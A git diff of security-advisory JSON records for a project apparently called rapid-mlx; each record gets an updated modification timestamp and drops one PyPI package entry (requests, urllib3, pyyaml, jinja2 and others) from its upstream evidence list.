b/advisories/BREW-rapid-mlx-CVE-2014-1829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2014-1829", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-cfj3-7x9c-4p3h", "CVE-2014-1829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2014-1830.json b/advisories/BREW-rapid-mlx-CVE-2014-1830.json index 0b19097141..de6f764ee9 100644 --- a/advisories/BREW-rapid-mlx-CVE-2014-1830.json +++ b/advisories/BREW-rapid-mlx-CVE-2014-1830.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2014-1830", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-652x-xj99-gmcc", "CVE-2014-1830", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2015-2296.json b/advisories/BREW-rapid-mlx-CVE-2015-2296.json index d7a9740bf7..1467bfe5a2 100644 --- a/advisories/BREW-rapid-mlx-CVE-2015-2296.json +++ b/advisories/BREW-rapid-mlx-CVE-2015-2296.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2015-2296", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-pg2w-x9wp-vw92", "CVE-2015-2296", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2015-5237.json b/advisories/BREW-rapid-mlx-CVE-2015-5237.json index d36aa9ce7c..81f7a9366e 100644 --- a/advisories/BREW-rapid-mlx-CVE-2015-5237.json +++ b/advisories/BREW-rapid-mlx-CVE-2015-5237.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2015-5237", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-jwvw-v7c5-m82h", "CVE-2015-5237", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "protobuf", - "subject_version": "7.36.1", - "key": "pkg:pypi/protobuf@7.36.1", - "resource": "protobuf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2015-8557.json b/advisories/BREW-rapid-mlx-CVE-2015-8557.json index 5ec435deca..bafcbf35e4 100644 --- a/advisories/BREW-rapid-mlx-CVE-2015-8557.json +++ b/advisories/BREW-rapid-mlx-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2015-8557", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-20T09:36:55Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2016-10075.json b/advisories/BREW-rapid-mlx-CVE-2016-10075.json index d725915d93..4d6b8d9f3a 100644 --- a/advisories/BREW-rapid-mlx-CVE-2016-10075.json +++ b/advisories/BREW-rapid-mlx-CVE-2016-10075.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2016-10075", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-r7q7-xcjw-qx8q", "CVE-2016-10075", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "tqdm", - "subject_version": "4.70.0", - "key": "pkg:pypi/tqdm@4.70.0", - "resource": "tqdm" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2016-10745.json b/advisories/BREW-rapid-mlx-CVE-2016-10745.json index 6ef449a5de..9f9d935c00 100644 --- a/advisories/BREW-rapid-mlx-CVE-2016-10745.json +++ b/advisories/BREW-rapid-mlx-CVE-2016-10745.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2016-10745", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-hj2j-77xm-mc5v", "CVE-2016-10745", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2016-9015.json b/advisories/BREW-rapid-mlx-CVE-2016-9015.json index e5f1979b78..e8b1d0f7e7 100644 --- a/advisories/BREW-rapid-mlx-CVE-2016-9015.json +++ b/advisories/BREW-rapid-mlx-CVE-2016-9015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2016-9015", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-v4w5-p2hg-8fh6", "CVE-2016-9015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2017-11424.json b/advisories/BREW-rapid-mlx-CVE-2017-11424.json index 2ab4bdf251..1f8fabc8f9 100644 --- a/advisories/BREW-rapid-mlx-CVE-2017-11424.json +++ b/advisories/BREW-rapid-mlx-CVE-2017-11424.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2017-11424", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-r9jw-mwhq-wp62", "CVE-2017-11424", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2017-18342.json b/advisories/BREW-rapid-mlx-CVE-2017-18342.json index 1e972eeebb..d14b5f9504 100644 --- a/advisories/BREW-rapid-mlx-CVE-2017-18342.json +++ b/advisories/BREW-rapid-mlx-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2017-18342", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2018-1000518.json b/advisories/BREW-rapid-mlx-CVE-2018-1000518.json index f015671a88..5e286f6bcb 100644 --- a/advisories/BREW-rapid-mlx-CVE-2018-1000518.json +++ b/advisories/BREW-rapid-mlx-CVE-2018-1000518.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2018-1000518", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-28T13:10:53Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-6g87-ff9q-v847", "CVE-2018-1000518", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "websockets", - "subject_version": "17.1", - "key": "pkg:pypi/websockets@17.1", - "resource": "websockets" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2018-18074.json b/advisories/BREW-rapid-mlx-CVE-2018-18074.json index 727fb91cf6..5930bed77c 100644 --- a/advisories/BREW-rapid-mlx-CVE-2018-18074.json +++ b/advisories/BREW-rapid-mlx-CVE-2018-18074.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2018-18074", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-x84v-xcm2-53pg", "CVE-2018-18074", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2018-20060.json b/advisories/BREW-rapid-mlx-CVE-2018-20060.json index d72c8816bc..8862c96d43 100644 --- a/advisories/BREW-rapid-mlx-CVE-2018-20060.json +++ b/advisories/BREW-rapid-mlx-CVE-2018-20060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2018-20060", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-www2-v7xj-xrc6", "CVE-2018-20060", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2018-25091.json b/advisories/BREW-rapid-mlx-CVE-2018-25091.json index 2ae1e6f0d7..37adc029b6 100644 --- a/advisories/BREW-rapid-mlx-CVE-2018-25091.json +++ b/advisories/BREW-rapid-mlx-CVE-2018-25091.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2018-25091", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-gwvm-45gx-3cf8", "CVE-2018-25091", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2019-10906.json b/advisories/BREW-rapid-mlx-CVE-2019-10906.json index c999c6722e..6cf5526f32 100644 --- a/advisories/BREW-rapid-mlx-CVE-2019-10906.json +++ b/advisories/BREW-rapid-mlx-CVE-2019-10906.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2019-10906", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-462w-v97r-4m45", "CVE-2019-10906", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2019-11236.json b/advisories/BREW-rapid-mlx-CVE-2019-11236.json index 35f9cf8143..0733acd2be 100644 --- a/advisories/BREW-rapid-mlx-CVE-2019-11236.json +++ b/advisories/BREW-rapid-mlx-CVE-2019-11236.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2019-11236", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2019-11324.json b/advisories/BREW-rapid-mlx-CVE-2019-11324.json index b6a3cc7b55..479aff108d 100644 --- a/advisories/BREW-rapid-mlx-CVE-2019-11324.json +++ b/advisories/BREW-rapid-mlx-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2019-11324", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2019-18874.json b/advisories/BREW-rapid-mlx-CVE-2019-18874.json index 0e1f0995bf..2539d70c8e 100644 --- a/advisories/BREW-rapid-mlx-CVE-2019-18874.json +++ b/advisories/BREW-rapid-mlx-CVE-2019-18874.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2019-18874", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-qfc5-mcwq-26q8", "CVE-2019-18874", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "psutil", - "subject_version": "7.2.2", - "key": "pkg:pypi/psutil@7.2.2", - "resource": "psutil" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2019-20477.json b/advisories/BREW-rapid-mlx-CVE-2019-20477.json index fd13a15172..58dbaf6d21 100644 --- a/advisories/BREW-rapid-mlx-CVE-2019-20477.json +++ b/advisories/BREW-rapid-mlx-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2019-20477", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2020-14343.json b/advisories/BREW-rapid-mlx-CVE-2020-14343.json index b2183b5049..8797595873 100644 --- a/advisories/BREW-rapid-mlx-CVE-2020-14343.json +++ b/advisories/BREW-rapid-mlx-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2020-14343", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2020-1747.json b/advisories/BREW-rapid-mlx-CVE-2020-1747.json index ecb568e10a..b1247a7981 100644 --- a/advisories/BREW-rapid-mlx-CVE-2020-1747.json +++ b/advisories/BREW-rapid-mlx-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2020-1747", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2020-26137.json b/advisories/BREW-rapid-mlx-CVE-2020-26137.json index f6dd26146a..4c10039d17 100644 --- a/advisories/BREW-rapid-mlx-CVE-2020-26137.json +++ b/advisories/BREW-rapid-mlx-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2020-26137", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2020-28493.json b/advisories/BREW-rapid-mlx-CVE-2020-28493.json index e29095b952..a15243e4eb 100644 --- a/advisories/BREW-rapid-mlx-CVE-2020-28493.json +++ b/advisories/BREW-rapid-mlx-CVE-2020-28493.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2020-28493", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-g3rq-g295-4j3m", "CVE-2020-28493", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2020-7212.json b/advisories/BREW-rapid-mlx-CVE-2020-7212.json index 708d503715..ae407a8e36 100644 --- a/advisories/BREW-rapid-mlx-CVE-2020-7212.json +++ b/advisories/BREW-rapid-mlx-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2020-7212", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2020-7694.json b/advisories/BREW-rapid-mlx-CVE-2020-7694.json index 38dcdb129f..9821f9fe92 100644 --- a/advisories/BREW-rapid-mlx-CVE-2020-7694.json +++ b/advisories/BREW-rapid-mlx-CVE-2020-7694.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2020-7694", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-23T21:33:37Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-33c7-2mpw-hg34", "CVE-2020-7694", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "uvicorn", - "subject_version": "0.52.4", - "key": "pkg:pypi/uvicorn@0.52.4", - "resource": "uvicorn" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2020-7695.json b/advisories/BREW-rapid-mlx-CVE-2020-7695.json index 8d16efc5b7..349cc37324 100644 --- a/advisories/BREW-rapid-mlx-CVE-2020-7695.json +++ b/advisories/BREW-rapid-mlx-CVE-2020-7695.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2020-7695", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-23T21:33:37Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-f97h-2pfx-f59f", "CVE-2020-7695", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "uvicorn", - "subject_version": "0.52.4", - "key": "pkg:pypi/uvicorn@0.52.4", - "resource": "uvicorn" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2021-20270.json b/advisories/BREW-rapid-mlx-CVE-2021-20270.json index 40b4ae2c21..beb92f0a6f 100644 --- a/advisories/BREW-rapid-mlx-CVE-2021-20270.json +++ b/advisories/BREW-rapid-mlx-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2021-20270", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-20T09:36:55Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2021-27291.json b/advisories/BREW-rapid-mlx-CVE-2021-27291.json index e56e3c7c71..3a1446d4a4 100644 --- a/advisories/BREW-rapid-mlx-CVE-2021-27291.json +++ b/advisories/BREW-rapid-mlx-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2021-27291", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-20T09:36:55Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2021-28363.json b/advisories/BREW-rapid-mlx-CVE-2021-28363.json index 6f258eeb47..2f5629b043 100644 --- a/advisories/BREW-rapid-mlx-CVE-2021-28363.json +++ b/advisories/BREW-rapid-mlx-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2021-28363", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2021-32677.json b/advisories/BREW-rapid-mlx-CVE-2021-32677.json index 96123285cb..074d6f3a60 100644 --- a/advisories/BREW-rapid-mlx-CVE-2021-32677.json +++ b/advisories/BREW-rapid-mlx-CVE-2021-32677.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2021-32677", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:35:32Z", "upstream": [ "GHSA-8h2j-cgx8-6xv7", "CVE-2021-32677", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "fastapi", - "subject_version": "0.141.1", - "key": "pkg:pypi/fastapi@0.141.1", - "resource": "fastapi" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2021-33503.json b/advisories/BREW-rapid-mlx-CVE-2021-33503.json index bd98e3b350..58e311d5b2 100644 --- a/advisories/BREW-rapid-mlx-CVE-2021-33503.json +++ b/advisories/BREW-rapid-mlx-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2021-33503", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2021-33880.json b/advisories/BREW-rapid-mlx-CVE-2021-33880.json index b2c10f6053..03da5b45ff 100644 --- a/advisories/BREW-rapid-mlx-CVE-2021-33880.json +++ b/advisories/BREW-rapid-mlx-CVE-2021-33880.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2021-33880", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-28T13:10:53Z", + "modified": "2026-09-10T20:37:34Z", "upstream": [ "GHSA-8ch4-58qp-g3mp", "CVE-2021-33880", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "websockets", - "subject_version": "17.1", - "key": "pkg:pypi/websockets@17.1", - "resource": "websockets" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2021-41945.json b/advisories/BREW-rapid-mlx-CVE-2021-41945.json index a40b8d817a..6076b59c80 100644 --- a/advisories/BREW-rapid-mlx-CVE-2021-41945.json +++ b/advisories/BREW-rapid-mlx-CVE-2021-41945.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2021-41945", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:32Z", "upstream": [ "GHSA-h8pj-cxx2-jfg2", "CVE-2021-41945", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "httpx", - "subject_version": "0.28.1", - "key": "pkg:pypi/httpx@0.28.1", - "resource": "httpx" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2022-1941.json b/advisories/BREW-rapid-mlx-CVE-2022-1941.json index 822076a3b9..5c64e424ed 100644 --- a/advisories/BREW-rapid-mlx-CVE-2022-1941.json +++ b/advisories/BREW-rapid-mlx-CVE-2022-1941.json @@ -2,7 +2,7 @@ 